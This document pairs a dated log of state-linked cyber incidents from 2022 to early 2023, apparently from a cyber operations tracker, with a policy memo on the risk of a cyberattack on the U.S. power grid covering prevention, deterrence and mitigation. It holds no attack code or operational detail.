January 2023. Hackers used ransomware to encrypt 12 servers at Costa Rica’s Ministry of Public Works, knocking all its servers offline.

January 2023. Albanian officials reported that its government servers were still near-daily targets of cyber-attacks following a major attack by Iran-linked hackers in 2022.

January 2023. Hackers launched a series of cyber-attacks against Malaysian national defense networks. Malaysian officials stated that the hacking activities were detected early enough to prevent any network compromise.

January 2023. Hackers targeted government, military, and civilian networks across the Asia Pacific leveraging malware to obtain confidential information. The malware targeted both the data on victim machines as well as audio captured by infected machines’ microphones.

January 2023. Hackers sent over a thousand emails containing malicious links to Moldovan government accounts.

December 2022. China-linked hackers launched phishing attacks against government, education, and research sector victims across the Asia Pacific. These attacks contained malware designed for espionage.

December 2022. Hackers launched email phishing attacks against Ukranian government agencies and state railway systems. The emails included information on kamikaze drone identification and deployed malware designed for espionage onto victim machines.

December 2022. Hackers obtained contact information for more than 80,000 members of FBI threat information sharing program, InfraGard. They then posted this information for sale on a cybercrime forum.

December 2022. Microsoft reported that it observed a pattern of attacks targeting Ukranian critical infrastructure from Russian hacking group, Sandworm. These attacks were accompanied by pro-Russian propaganda.

December 2022. The Human Rights Watch reported an ongoing, well-resourced cyber espionage, social engineering, and phishing campaign against human rights activists, journalists, diplomats, and politicians located across the Middle East. The organization attributed these operations to Iran-linked hackers.

December 2022. Hackers made Italy’s Ministry of Agriculture website unavailable through a DDoS attack. Italian officials described the attacks as “demonstrative” and claim that no data was breached and that they expect no lasting damage.

December 2022. Russia-linked hackers leveraged the networks of healthcare organizations, businesses, and critical infrastructures across the U.S., UK, France, and other countries to attack targets in Ukraine. Hackers’ primary motivations appear to be information stealing and disruption.

December 2022. Iran-linked hackers obtained and leaked data from government ministries in Saudi Arabia.

December 2022. Russia-linked hackers launched a DDoS attack against Vatican City servers, knocking its official website offline. The attack came three days after Russian government officials criticized Pope Francis for his comments about the war in Ukraine.

December 2022. Hackers launched a DDoS attack against the Danish defense ministry that disrupted access to its websites.

December 2022. Russia’s foreign minister claimed to be the target of coordinated cyber aggression by external intelligence agencies, IT companies, and hacktivists. According to Russian officials, such attacks have “doubled or tripled” over the past year.

December 2022. Chinese government-linked hackers stole at least $20 million in COVID-19 relief funds from the U.S. government, including Small Business Administration loans and unemployment insurance money. The U.S. Secret Service announced they retrieved half of the stolen funds thus far.

December 2022. Chinese-linked hackers targeted Amnesty International of Canada in an apparent espionage operation.

December 2022. A U.S. lawmaker predicted spyware hacks of U.S. government employees could be in the hundreds, including diplomats in multiple countries. This follows a probe into how many devices spyware are affected in the U.S. government.

November 2022. Hackers disrupted operations at an Indian hospital by cutting off access to its online networks and patient records. It took hospital officials and federal authorities nearly two weeks to regain access to hospital servers and recover lost data.

November 2022. Microsoft and ESET attributed cyberattacks aimed at the energy sector and logistics industries in Ukraine and Poland to a Russian GRU hacking group. The campaign began in late September 2022.

November 2022. Hackers targeted Bahraini government websites with DDoS attacks prior the country’s parliamentary and local elections.

November 2022. Iranian government-sponsored hackers compromised the U.S. Merit Systems Protection Board, exploiting the log4shell vulnerability as early as February 2022. After breaching the network, hackers installed cryptocurrency-mining software and deployed malware to obtain sensitive data.

November 2022. Hackers damaged Danish State Railways’ network after targeting an IT subcontractor’s software testing environment. The attack shut down train operations for several hours.

November 2022. An Indian-based hacking group targeted Pakistani politicians, generals and diplomats, deploying malware that enables the attacker access to computer cameras and microphones.

November 2022. State-sponsored hackers with possible ties to the Chinese government targeted multiple Asian countries in an espionage operation since March 2022, compromising a digital certificate authority in one country.

November 2022. Hackers disabled digital services of the Vanuatu government in a cyberattack. The attack affected all government services, disabling emails, websites, and government systems, with only partial access restored a month later. Australian sources stated the hack was a ransomware attack.

November 2022. Hackers targeted the Guadeloupe government, forcing the shutdown of all government computers to “protect data” during incident response and detect the scope of the attack.

November 2022. Indian hackers targeted Pakistani government entities, including the military, and companies since April 2020. The attacks enabled hackers to infiltrate systems and access computer controls.

November 2022. Suspected Chinese-linked hackers carried out an espionage campaign on public and private organizations in the Philippines, Europe, and the United States since 2021. The attacks used infected USB drives to deliver malware to the organizations.

November 2022. Chinese state-affiliated actors increased attacks on smaller nations in Southeast Asia for cyberespionage purposes.

October 2022. Hackers targeted a communications platform in Australia, which handles Department of Defence data, in a ransomware attack. The government believes hackers breached sensitive government data in this attack.

October 2022. A Ukrainian newspaper published hacked data claiming to be sensitive information from Russian defense contractors. The hackers responsible are part of an anti-Putin group in Russia.

October 2022. Hackers targeted Bulgarian websites belonging to the presidential administration, the Defense Ministry, the Interior Ministry, the Justice Ministry, and the Constitutional Court in a DDoS attack. A pro-Russian hacking group claimed responsibility for the attack, stating it was punishment “for betrayal to Russia and the supply of weapons to Ukraine.”

October 2022. Hackers targeted several major U.S. airports with a DDoS attack, impacting their websites. A pro-Russian hacking group promoted the attack prior to its execution.

October 2022. Pro-Russian hackers claimed responsibility for an attack that knocked U.S. state government websites offline, including Colorado’s, Kentucky’s and Mississippi’s.

October 2022. CISA, the FBI, and NSA announced state-sponsored hacking groups had long-term access to a defense company since January 2021 and compromised sensitive company data.

September 2022. Iranian hackers targeted Albanian computer systems, forcing Albanian officials to temporarily shut down the Total Information Management System, a service used to track individuals entering and exiting Albania. This attack closely followed Albania’s decision to sever diplomatic ties with Iran as well as the American sanctions and NATO’s condemnation of an Iranian cyberattack against Albania in July. In the July attack, Iranian actors deployed ransomware on Albanian Government networks that destroyed data and disrupted government services.

September 2022. A newly discovered hacking group targeted telecommunications, internet service providers, and universities in the Middle East and Africa. The group deploys malware platforms directly into systems’ memory, bypassing native security solutions.

September 2022. Hackers targeted Montenegro’s government networks, rendering Montenegro’s main state websites and government information platforms inaccessible. Montenegrin officials blamed Russia for the attack.

September 2022. Hackers targeted the state-level parliamentary website of Bosnia and Herzegovina, rendering the sites and servers inaccessible for multiple weeks.

September 2022. China accused the U.S. National Security Agency (NSA) of numerous cyberattacks against China’s Northwestern Polytechnical University. Authorities claim the NSA stole user data and infiltrated digital communications networks.

September 2022. The group Anonymous took responsibility for a series of cyberattacks against the Iranian government that took down two main Iranian government websites and the websites of several state media organizations.

September 2022. Hackers targeted the Mexican Defense Ministry and accessed six terabytes of data, including internal communications, criminal data, and data that revealed Mexico’s monitoring of Ken Salazar, the U.S. Ambassador to Mexico. Mexican President Andres Manuel Lopez Obrador confirmed the authenticity of the data, including personal health data released to the public.

September 2022. A Russian-based hacking group targeted the website of the United Kingdom’s intelligence agency MI5 with a DDoS attack that temporarily took the site offline.

August 2022. Hackers breached Italy’s energy agency, Gestore dei Servizi Energetici (GSE), compromising servers, blocking access to systems, and suspending access to the GSE website for a week.

August 2022. Hackers used a DDoS attack to temporarily take down the website of Taiwan’s presidential office. The Taiwanese government attributed the attack to foreign hackers and stated normal operations of the website resumed after 20 minutes. Taiwan’s Foreign Ministry also noted hackers targeted their website and the main portal website for Taiwan’s government.

August 2022. Hackers targeted the Finnish Parliament with a DDoS attack that rendered the Parliamentary website inaccessible. A Russian group claimed responsibility for the attack on Telegram.

August 2022. Hackers targeted the website of Ukraine’s state energy agency responsible for the oversight of Ukraine’s nuclear power plants. The agency stated Russian hackers carried out the attack.

August 2022. Hackers targeted the website of the Latvian Parliament with a DDoS attack that temporarily paralyzed the website’s server. A Russian hacking group claimed responsibility for the attack on Telegram.

August 2022. Hackers targeted Greece’s largest natural gas distributor DESFA causing a system outage and data exposure.

August 2022. A Russian group claimed responsibility for breaching a privately owned UK water supply company South Staffordshire Water and leaking files in an extortion attempt.

August 2022. Hackers targeted Montenegro’s government institutions, breaching the computer systems of several state bodies. Montenegro’s Defense Minister stated there was sufficient evidence to suspect Russia was behind the attack.

August 2022. A DDoS campaign targeted the websites of both government and private Estonian institutions. Estonia stated that the attack was largely repelled, and the impact was limited.

August 2022. Hackers used phishing emails to deploy malware in government institutions and defense firms throughout Eastern Europe in January 2022. A report by Russian-based company Kaspersky linked the campaign to a Chinese hacking group.

July 2022. Hackers targeted the Pakistan Air Force (PAF) in a spearfishing campaign to deploy malware and obtain sensitive files. Pakistani and Chinese organizations claimed the attack came from Indian-linked hackers.

July 2022. Hackers targeted Iran’s Islamic Culture and Communication Organization (ICCO). The attack took down at least 6 websites, placed images of Iranian resistance leaders on fifteen additional sites, wiped databases and computers, and allowed hackers to obtain access to sensitive ICCO data.

July 2022. A hacker claimed to acquire records on 1 billion Chinese from a Shanghai police database and posted the data for sale online.

July 2022. Belgium’s Foreign Ministry accused China of a cyberespionage campaign against Belgian targets, including Belgium’s Ministries of Interior and Defense. A spokesperson for the Chinese Embassy in Belgium denied the accusations.

July 2022. Hackers targeted social media accounts owned by the British Royal Army. The attack included the takeover of the British Army’s Twitter and YouTube accounts.

July 2022. Hackers targeted Lithuania’s state-owned energy provider in a DDoS attack. Killnet, which Lithuanian officials link to Russia, claimed responsibility for the attack.

July 2022. Hackers temporarily took down websites belonging to the Albanian Prime Minister’s Office and the Parliament, and the e-Albania portal used to access public services.

July 2022. Hackers breached a Ukrainian media company to broadcast on multiple radio stations that Ukrainian President Volodymyr Zelenskyy was in critical condition. Zelenskyy refuted the claims and blamed Russia for the attack.

July 2022. China stated the United States stole 97 billion pieces of global internet data and 124 billion pieces of telephone data in June, specifically blaming the National Security Agency (NSA)’s Office of Tailored Access Operations (TAO).

June 2022. Hackers targeted Lithuania’s state railway, airports, media companies, and government ministries with DDoS attacks. A Russian-backed hacking group claimed responsibility for the attack.

June 2022. The FBI, National Security Agency (NSA) and CISA announced that Chinese state-sponsored hackers targeted and breached major telecommunications companies and network service providers since at least 2020.

June 2022. Hackers targeted former Israeli officials, military personnel, and a former U.S. Ambassador to Israel. An Israeli cybersecurity firm stated Iranian-linked actors used a phishing campaign to gain access to the targets’ inboxes, personally identifiable information, and identity documents.

June 2022. Hackers targeted three Iranian steel companies, forcing the country’s state-owned plant to halt production.

June 2022. Hackers leaked files and photos known as “The Xinjiang Police Files” displaying human rights abuses committed by the Chinese government against the Uyghur population.

June 2022. An attack targeted users of Australia’s largest Chinese-language platform, Media Today. The hackers made over 20 million attempts to reset user passwords in the platform’s registration system.

June 2022. Hackers targeted municipal public address systems in Jerusalem and Eliat, triggering the air raid sirens systems throughout both cities. An Israeli industrial cybersecurity firm attributed the attack to Iran.

June 2022. A Chinese-linked disinformation campaign targeted an Australian mining company. The campaign included spreading disinformation on social media platforms and websites regarding the company’s alleged environmental record.

June 2022. A phishing campaign targeted U.S. organizations in military, software, supply chain, healthcare, and pharmaceutical sectors to compromise Microsoft Office 365 and Outlook accounts.

June 2022. Hackers compromised accounts belonging to officials in Germany’s Greens party, including ones used previously by Annalena Baerbock and Robert Habeck, who now serve as Minister for Foreign Affairs and Minister for Economic Affairs and Climate Action.

June 2022. Hackers targeted Norwegian public institutions with DDoS attacks, disrupting government websites. The Norwegian NSM security authority attributed the attack to pro-Russian hackers.

May 2022. A DDoS attack targeted the Port of London Authority, forcing its website to go offline. A group linked to Iran took responsibility for the hack.

May 2022. A phishing campaign targeted the Jordan Ministry of Foreign Affairs. Researchers attributed the attack to an Iranian cyber espionage actor.

May 2022. The Ethiopian Information Network Security Agency (INSA) stated hackers targeted the Grand Ethiopian Renaissance Dam (GERD). Ethiopia’s communications security agency thwarted the attacks before hackers could gain access to the networks.

May 2022. Hackers targeted Greenland’s healthcare system, causing networks to crash throughout the island. While an initial diagnosis determined the attack did not damage or expose citizens’ data, it made health services severely limited.

May 2022. A Chinese hacking group stole intellectual property assets from U.S and European companies since 2019 and went largely undetected. Researchers believe the group is backed by the Chinese government.

May 2022. State-sponsored hackers took down RuTube, the Russian version of YouTube, according to the company.

May 2022. Russian hackers hit Italian websites with a DDoS attack, including the Senate, the Ministry of Defence, and the National Health Institute. The group states its goal was to target NATO countries and Ukraine.

April 2022. The Romanian National Directorate of Cyber Security said that multiple public and private sector websites were hit with DDoS attacks. The victims included the ministry of defense, border police, national railway company, and the OTP Bank. A group claiming credit for the attack said on Telegram that it hacked the websites because Romania supported Ukraine since the Russian invasion of the country.

April 2022. Cybersecurity researchers identified a new campaign by Russian-linked hackers that started in January and targets diplomats and embassy officials from France, Poland, Portugal, and other countries. The hacks started with a phishing email to deliver a malware-laden file to the target.

April 2022. Iranian state television claimed that the government foiled cyber intrusions that targeted more than 100 public sector agencies. They provided no further information on the incident.

April 2022. Russian hackers targeted the Costa Rican Ministry of Finance in a cyberattack, crippling tax collection and export systems. The newly elected President of Costa Rica declared a national emergency as a result of the attack and the group asked for $20 million in ransom or it plans to leak the stolen data.

April 2022. Hackers targeted members of the European Commission with spyware developed by NSO Group. An Apple notification from November to thousands of iPhone users stating they were targeted by state-sponsored actor alerted the Commission of this spyware use.

April 2022. A North Korea-linked hacking campaign using phishing emails sent from fake job recruiters targeted chemical companies in South Korea.

April 2022. A Citizen Lab study discovered actors used NSO Group spyware to target at least 65 Catalonian activists and political figures.

April 2022. The U.S. Treasury Department’s Office of Foreign Assets Control attributed the March 29 hack of Ronin Network to a North Korean hacking group and announced sanctions against the hackers. The group stole over $540 million in Ethereum and USDC.

April 2022. Hackers launched DDoS attacks against websites belonging to the Finnish Ministries of Defence and Foreign Affairs. The attack’s botnet used over 350 IP addresses from around the world and the denial of service was sustained for four hours.

April 2022. Hackers targeted the Telegram accounts of Ukrainian government officials with a phishing attack in an attempt to gain access to the accounts.

April 2022. Cybersecurity researchers observed hackers penetrating the networks of at least 7 Indian State Load Dispatch Centres (SLDCs) which oversee operations for electrical grid control. The SLDCs manage SCADA systems and researchers suggested that PLA-linked hackers may be involved.

April 2022. A social media platform disrupted two Iranian-linked cyber espionage campaigns that targeted activists, academics, and private companies. The campaign targeted businesses in the energy, semiconductor, and telecom sectors in countries including the U.S., Israel, Russia, and Canada by using phishing and other social engineering techniques.

April 2022. A group targeted several Ukrainian media organizations in an attempt to gain long-term access to their networks and collect sensitive information, according to researchers. The group has connections to the Russian GRU.

April 2022. The United States removed Russian malware from computer networks around the world, a move made public by Attorney General Merrick B. Garland. While it is unclear what the malware’s intention was, authorities noted it could be used from anything from surveillance to destructive attacks. The malware created a botnet controlled by the Russian GRU.

April 2022. Hackers targeted a Ukrainian energy facility, but CERT-UA and private sector assistance largely thwarted attempts to shutdown electrical substations in Ukraine. Researchers believe the attack came from the same group with ties to the Russian GRU that targeted Ukraine’s power grid in 2016, using an updated form of the same malware.

April 2022: Hackers targeted Ukraine’s National Post Office with a DDoS attack, days after releasing a new stamp honoring a Ukrainian border guard. Th attack affected the agency’s ability to run their online store.

Introduction

The U.S. power grid has long been considered a logical target for a major cyberattack. Besides the intrinsic importance of the power grid to a functioning U.S. society, all sixteen sectors of the U.S. economy deemed to make up the nation’s critical infrastructure rely on electricity. Disabling or otherwise interfering with the power grid in a significant way could thus seriously harm the United States.

Robert K. Knake Whitney Shepardson Senior Fellow

Carrying out a cyberattack that successfully disrupts grid operations would be extremely difficult but not impossible. Such an attack would require months of planning, significant resources, and a team with a broad range of expertise. Although cyberattacks by terrorist and criminal organizations cannot be ruled out, the capabilities necessary to mount a major operation against the U.S. power grid make potential state adversaries the principal threat.

Attacks on power grids are no longer a theoretical concern. In 2015, an attacker took down parts of a power grid in Ukraine. Although attribution was not definitive, geopolitical circumstances and forensic evidence suggest Russian involvement. A year later, Russian hackers targeted a transmission level substation, blacking out part of Kiev. In 2014, Admiral Michael Rogers, director of the National Security Agency, testified before the U.S. Congress that China and a few other countries likely had the capability to shut down the U.S. power grid. Iran, as an emergent cyber actor, could acquire such capability. Rapid digitization combined with low levels of investment in cybersecurity and a weak regulatory regime suggest that the U.S. power system is as vulnerable—if not more vulnerable—to a cyberattack as systems in other parts of the world.

An adversary with the capability to exploit vulnerabilities within the U.S. power grid might be motivated to carry out such an attack under a variety of circumstances. An attack on the power grid could be part of a coordinated military action, intended as a signaling mechanism during a crisis, or as a punitive measure in response to U.S. actions in some other arena. In each case, the United States should consider not only the potential damage and disruption caused by a cyberattack but also its broader effects on U.S. actions at the time it occurs. With respect to the former, a cyberattack could cause power losses in large portions of the United States that could last days in most places and up to several weeks in others. The economic costs would be substantial. As for the latter concern, the U.S. response or non-response could harm U.S. interests. Thus, the United States should take measures to prevent a cyberattack on its power grid and mitigate the potential harm should preventive efforts fail.

The Contingency

The U.S. power system has evolved into a highly complex enterprise: 3,300 utilities that work together to deliver power through 200,000 miles of high-voltage transmission lines; 55,000 substations; and 5.5 million miles of distribution lines that bring power to millions of homes and businesses. Any of the system’s principal elements––power generation, transmission, or distribution––could be targeted for a cyberattack. In the Ukraine case, attackers targeted substations that lower transmission voltages for distribution to consumers. Lloyd’s of London, an insurance underwriter, developed a plausible scenario for an attack on the Eastern Interconnection—one of the two major electrical grids in the continental United States—which services roughly half the country. The hypothetical attack targeted power generators to cause a blackout covering fifteen states and the District of Columbia, leaving ninety-three million people without power. Other experts have concluded that an attack on the system for transmitting power from generation to end consumers would have devastating consequences. In one scenario, disruption of just nine transformers could cause widespread outages. Many experts are now also concerned that smart grid technologies, which use the internet to connect to power meters and appliances, could allow an attacker to take over thousands—if not millions—of unprotected devices, preventing power from being delivered to end users.

State actors are the most likely perpetrators of a power grid attack.

Regardless of which part of the power grid is targeted, attackers would need to conduct extensive research, gain initial access to utility business networks (likely through spearphishing), work to move through the business networks to gain access to control systems, and then identify targeted systems and develop the capability to disable them. Such sophisticated actions would require extensive planning by an organization able to recruit and coordinate a team that has a broad set of capabilities and is willing to devote many months, if not years, to the effort. State actors, therefore, are the more likely perpetrators, and given these long lead times, U.S. adversaries have likely already begun this process in anticipation of conflict. It is doubtful that a terrorist organization would have both the intent and means to carry out such an attack successfully. In the future, however, criminal groups could pose a real threat. They are growing in sophistication and in some cases rival, if not exceed, the capabilities of nation states. Payments for ransomware—malicious software that encrypts data and will not provide a code to unlock it unless a ransom has been paid—by some estimates have topped $300 million. This funding could allow criminal groups to purchase more sophisticated capabilities to carry out the ultimate ransomware attack.

The likelihood that an attack carried out by a determined and capable adversary would be thwarted by security measures is low. While some U.S. utilities might block attempts by an adversary to gain initial access or might be able to detect an adversary in their systems, many might not have the necessary tools in place to detect and respond. Efforts to improve data sharing that could enable detection by one company to block access across the entire industry are in their infancy. In the Lloyd’s scenario, only 10 percent of targeted generators needed to be taken down to cause a widespread blackout.

Short of outright conflict with a state adversary, several plausible scenarios in which the U.S. power grid would be subject to cyberattack need to be considered:

Discrediting Operations. Given the importance of electricity to the daily lives of Americans, an adversary may see advantage in disrupting service to undermine public support for a U.S. administration at a politically sensitive time.

Distracting Operations. A state contemplating a diplomatic or military initiative likely to be opposed by the United States could carry out a cyberattack against the U.S. power grid that would distract the attention of the U.S. government and disrupt or delay its response.

Given the fragility of many industrial control systems, even reconnaissance activity risks accidentally causing harm.

Retaliatory Operations. In response to U.S. actions considered threatening by another state, such as the imposition of economic sanctions and various forms of political warfare, a cyberattack on the power grid could be carried out to punish the United States or intimidate it from taking further action with the implied threat of further damage.

There are many plausible circumstances in which states that possess the capability to conduct cyberattacks on the U.S. power grid––principally Russia and China, and potentially Iran and North Korea––could contemplate such action for the reasons elaborated above. However, considerable potential exists to miscalculate both the impact of a cyberattack on the U.S. grid and how the U.S. government might respond. Attacks could easily inflict much greater damage than intended, in good part because the many health and safety systems that depend on electricity could fail as well, resulting in widespread injuries and fatalities. Given the fragility of many industrial control systems, even reconnaissance activity risks accidentally causing harm. An adversary could also underestimate the ability of the United States to attribute the source of a cyberattack, with important implications for what happens thereafter. Thus, an adversary’s expectations that it could attack the power grid anonymously and with impunity could be unfounded.

Warning Indicators

A series of warning indicators would likely foretell a cyberattack on the U.S. power grid. Potential indicators could include smaller test-run attacks outside the United States on systems that are used in the United States; intelligence collection that indicates an adversary is conducting reconnaissance or is in the planning stages; deterioration in relations leading to escalatory steps such as increased intelligence operations, hostile rhetoric, and recurring threats; and increased probing of electric sector networks and/or the implementation of malware that is detected by more sophisticated utilities.

Implications for U.S. interests

A large-scale cyberattack on the U.S. power grid could inflict considerable damage. The 2003 Northeast Blackout left fifty million people without power for four days and caused economic losses between $4 billion and $10 billion. The Lloyd’s scenario estimates economic costs of $243 billion and a small rise in death rates as health and safety systems fail. While darker scenarios envision scarcity of water and food, deterioration of sanitation, and a breakdown in security, leading to a societal collapse, it would be possible to mitigate the worst effects of the outage and have power restored to most areas within days. At this level of damage, the American public would likely demand a forceful response, which could reshape U.S. geopolitical interests for decades. Traditional military action, as opposed to a response in kind, would be likely.

In addition to the direct consequences of a cyberattack, how the United States responds also has implications for its management of the situation that may have prompted the attack in the first place, the state of relations with the apparent perpetrator, the perceived vulnerability of the United States, and the evolution of international norms on cyberwarfare.

How the U.S. government reacts will determine whether a cyberattack has a continuing impact on geopolitics.

How the U.S. government reacts, more than the actual harm done, will determine whether the cyberattack has a continuing impact on geopolitics. If the incident reveals a U.S. vulnerability in cyberspace that can be targeted to deter the United States from taking action abroad, the implications of the incident would be profound. If, on the other hand, the U.S. government shows firm resolve in the face of the attack and does not change its behavior in the interest of the attacker, the event is unlikely to have significant consequences for the role of the United States abroad.

On the domestic front, a highly disruptive attack would likely upend the model of private sector responsibility for cybersecurity. As was done with aviation security after 9/11, Congress would likely move quickly to take over responsibility for protecting the grid from cyberattack by either creating a new agency or granting new authorities to an existing agency such as U.S. Cyber Command. Such a move would likely reduce the efficiency of grid operations and open the door to expanding government’s role in protecting other sectors of the economy. A devastating attack might also prompt calls to create a national firewall, like China and other countries have, to inspect all traffic at national borders. However, the experience of other countries and the technical reality of the internet suggest that these firewalls are ineffective for cybersecurity but well suited to restricting speech online and censoring information.

Preventive Options

Preventing an attack will require improving the security of the power grid as well as creating a deterrence posture that would dissuade adversaries from attacking it. The goal of such a strategy should be to secure the power grid to make it defensible, to detect attempts to compromise the security of the grid, and to provide certainty to adversaries that the United States will be able to attribute the attack and respond accordingly.

Protective Measures. Unlike enterprise information technology, the industrial control systems that control the power grid typically perform single functions and need to communicate only with a small set of other devices in routine patterns. Thus, securing these systems and detecting malicious activity should, in theory, be relatively simple. In practice, many industrial control systems are built on general computing systems from a generation ago. They were not designed with security in mind and cannot be updated. This problem has not been corrected with the latest generation of smart grid technologies; the Government Accountability Office (GAO) has found that these devices often lack the ability to authenticate administrators and cannot maintain activity logs necessary for forensic analysis, among other deficiencies. These devices are often accessible from the public internet and use weak authentication mechanisms. Thus, improving the protection of the grid requires investing in new, more secure technology that can be protected and to implement basic cybersecurity hygiene. The challenge is, therefore, not to develop technical specifications to secure the grid but how to incentivize investment.

Sectors such as finance and defense have developed strong information sharing practices with government support.

A regulatory approach could theoretically set a minimum standard, thereby leveling costs across all companies and addressing cost-cutting in security measures. Such a regimen—the Critical Infrastructure Protection Standards established by the North America Electric Reliability Council (NERC)—has been in place for over a decade, though GAO has found that many standards remain voluntary and the extent to which utilities have implemented these standards is unknown. Raising and enforcing standards could help prevent a catastrophic attack by encouraging utilities to proactively defend their networks. A model for such an approach could be borrowed from the nuclear sector, where the Nuclear Regulatory Council has established so-called Design Basis Threats and requires nuclear plant operators to prove that they have the controls in place to defeat such threats. Yet, given the thin margins on which utilities operate, such an unfunded mandate is not likely to meaningfully improve security. Moreover, current federal requirements do not extend to power distribution, which is regulated unevenly at the state level.

As regulated entities with fees set by control boards, utilities do not have sufficient budgets to significantly increase security funding. Risk managers at utilities will argue that they must balance the possibility of a cyberattack against the near certainty that weather events will affect their customers. A decision to increase spending on cybersecurity could come at the expense of burying power lines, raising them above the tree line, or trimming trees along the lines. In 2016, the Department of Energy (DOE) received only three reports of cyber incidents at utilities; none of the incidents affected customers. In the same time period, forty-one weather events caused outages, affecting 5.2 million customers. Numbers for 2015 show a similar pattern. Thus, some form of rate relief is needed to encourage significant investments in cybersecurity.

More could also be done to improve government support for securing electric utilities. The DOE has run a pilot program, known as the Cybersecurity Risk Information Sharing Program (CRISP), for several years to help companies detect advanced threats targeting their networks. DOE labs have also funded research projects on the specific cybersecurity needs of utilities. Yet critics of the program argue that it is too expensive for most utilities to participate in and that it is only focused on detecting threats at network boundaries rather than within ICS networks. Expansion of intelligence and data sharing between the government and private companies, and among private companies themselves, could greatly reduce the chances of an attacker being capable of taking down multiple targets and causing a cascading effect. The Electricity Information Sharing and Analysis Center (E-ISAC) is mostly focused on physical threats and weather events. GAO found cybersecurity information sharing weak across the sector. Sectors such as finance and the defense industrial base have developed strong information sharing practices with government support. Emulating these efforts in the electricity sector would be a valuable government contribution to help owners and operators in the industry protect themselves.

Given the large number of utilities and the vast infrastructure to protect, even with improved cybersecurity, an adversary would still be likely to find numerous unprotected systems that can be disrupted. As the Lloyd’s analysis concluded, only 10 percent of targeted generators needed to be taken offline to cause widespread harm. Therefore, improving the security of individual utilities alone is unlikely to significantly deter attackers. By focusing on detecting early signs of an attack and sharing that information within the sector and with the government, even when individual utilities fail to detect attacks on themselves, they can warn the government and other companies and help prevent wider disruption.

Deterrent Measures. Adversaries may underestimate both the ability of the U.S. government to determine who carried out an attack and the seriousness with which such an attack would be addressed. Law enforcement agencies such as the Federal Bureau of Investigation (FBI) and the U.S. Secret Service have built strong forensic investigation capabilities and strong relationships with both foreign law enforcement and the intelligence community. Through cooperation, the U.S. government has been able to determine the parties behind most major attacks. The Barack Obama administration publicly named the foreign actors behind some attacks and provided supporting evidence on a case-by-case basis. Making public attribution of attacks a routine practice could be a deterrent.

Beyond simply naming the adversary behind attacks, the U.S. government could make clear how it would view an attack on the power grid and the kinds of responses it would consider. Characterizing an attack on the power grid as an armed attack would likely have the strongest deterrent effect. Doing so would reflect the developing norms against peacetime attacks on critical infrastructure as agreed to in the UN Group of Governmental Experts. In keeping with these norms, the U.S. government could outline response options that would be proportional but not necessarily in kind. These response options would clarify how the U.S. government would respond not only to a successful attack but also to a failed attempt and to the discovery of adversarial probing and exploration to prepare for an attack.

In developing its policy, the U.S. government should keep in mind that a strong policy against targeting U.S. systems could constrain U.S. military options to target foreign systems. Yet, given the long lead times for carrying out a successful cyberattack campaign, labeling reconnaissance activities as hostile actions and limiting such activities by U.S. cyber operators could mean forgoing the ability to make significant use of cyber operations during a conflict.

Mitigating Options

If an attack on the grid cannot be prevented, steps can be taken now to mitigate the effects of the attack and plan the response.

Pre-Attack Measures. Actions taken now could significantly mitigate the effects of a large-scale blackout caused by a cyberattack. Maintaining and exercising manual operations of the grid, planning and exercising recovery operations, and continually expanding distributed power could significantly shorten the duration of any blackout and reduce economic and societal damage.

A SANS Institute report concluded that the effects of the attack on Ukraine’s power grid were largely mitigated because grid operations there could be returned to manual control. Most experts believe that the current complexity of grid operations in the United States would make a switch to manual operations difficult; newer systems might not allow for the use of manual controls at all. Requiring the ability to shift to manual controls and exercising those controls on an annual basis might now be the most valuable step to take. Michael Assante, the former chief information security officer for NERC, argues that utilities should design their systems with backup tools that are either not connected to any information technology networks or are analog. For certain pieces of technology, it may make sense to replace software systems with hardware systems, “hardwiring” functions into circuit boards so that they cannot be modified remotely.

The next administrator of the Federal Emergency Management Agency (FEMA) could make response and recovery planning a priority. The all-hazards approach favored in emergency management may prove insufficient for a blackout of long duration covering large swaths of the nation. Beyond domestic emergency planning, exercising crisis response at a national level with government, allies, and private sector actors would be valuable. Doing so would identify the difficulties of operating without power systems and prompt the development of response options to prevent unneeded delay.

The continued expansion of distributed generation in the form of wind and solar installations could also significantly reduce the magnitude of an attack on the grid; however, most rooftop systems feed directly into the grid, and homes and businesses do not draw from their own systems. From a resiliency perspective, it might be worth incentivizing the purchase of systems that allow a direct draw and have on-site storage. Moving military installations in the continental United States off the grid so that they can supply their own power would eliminate one of the rationales for attacking the grid and limit the hindrance caused by such an attack on military operations.

A strong statement on deterrence could do more than anything else to prevent an attack on the grid.

Post-Attack Measures. Following an attack, eliminating malware and regaining control of the power grid would likely be carried out by the owners and the operators of affected systems with support from private incident response teams. Specialized support from the Department of Homeland Security’s Industrial Control System Computer Emergency Response Team (ICS-CERT) and the DOE national labs would also be provided.

The government’s main role would be attributing the attack and responding to it. The FBI would take lead responsibility for investigating the attack domestically and for conducting computer forensics. The intelligence community would look at its existing intelligence collection for indications of what might have been missed and would begin targeted collection efforts to trace the attack. Within weeks, the U.S. government would have confidence in its attribution.

The White House would set the public posture for the response. Based on precedents from both cyber- and non-cyberattacks over multiple administrations, government agencies would likely advocate for a show of firm resolve but recommend avoiding a rush to judgment or an immediate counterattack. Agencies would present a range of options to respond. These options would include a show of military force, such as moving U.S. ships into disputed waters or staging exercises in contested regions; response in kind, through cyberspace; traditional military options; public and private diplomacy; use of economic sanctions targeting the state and the private entities or individuals involved; use of international law enforcement to arrest any parties involved; and targeting of known intelligence assets. The president should choose a strategy that combines these options in such a way as to deter the adversary from escalating further—the adversary should recognize that the consequences of continued escalation will be severe and choose to cease hostile activity, allowing a reset of the relationship.

Recommendations

The Donald J. Trump administration should focus its efforts on preventing an attack on the grid both through a deterrence policy and by strengthening security. The deterrence policy should articulate how the administration would view an attack on the power grid and should outline possible response options. As a starting point, the administration should be clear that an action against the grid would be treated as an armed attack and signal that a military response in or out of cyberspace would likely be required. The policy should also address how the administration would view the discovery that an adversary had taken initial steps toward a takedown of the grid, particularly the discovery that foreign actors had infiltrated utility networks. Together with continually demonstrating law enforcement and intelligence capabilities to attribute the sources of cyberattacks, a strong statement on deterrence could do more than anything else to prevent an attack on the grid. To ensure that the United States will be able to maintain military operations even in the face of a large blackout, the Trump administration should plan to end the reliance of military installations on the grid. Doing so would also reduce the likelihood of the grid becoming a military target.

